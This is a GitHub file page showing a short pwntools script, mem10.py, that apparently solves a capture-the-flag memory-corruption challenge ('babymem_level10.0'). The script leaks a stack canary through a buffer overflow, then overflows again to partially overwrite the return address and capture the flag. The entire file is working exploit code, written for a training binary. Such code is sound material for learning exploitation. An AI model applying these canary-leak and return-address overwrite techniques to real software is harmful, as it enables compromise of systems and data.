-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathmem10.py
34 lines (32 loc) · 926 Bytes
/
mem10.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from pwn import *
import binascii
import random
context.log_level='debug'
context.arch = 'amd64'
context.bits = 64
context.terminal = ['tmux', 'splitw', '-v']
payload_size = 0
while True:
proc = process(['/challenge/babymem_level10.0'])
# leak canary1
payload_size += 9
proc.recvuntil('Payload size: ')
proc.sendline(str(payload_size))
payload = b'REPEAT' + (payload_size - 6) * b'A'
proc.recvuntil('bytes)!')
proc.send(payload)
proc.recvuntil('You said: ')
ret = proc.recvuntil('Backdoor')
canary1 = b'\x00' + ret[payload_size:payload_size + 7]
# modify ret
payload_size2 = 328 + 2
proc.recvuntil('Payload size: ')
proc.sendline(str(payload_size2))
payload = 41 * canary1 + p8(0x18) + p8(0x18)
proc.recvuntil('bytes)!')
proc.send(payload)
proc.recvuntil('You said: ')
ret = proc.recvall()
if b'}' in ret:
print(ret)
break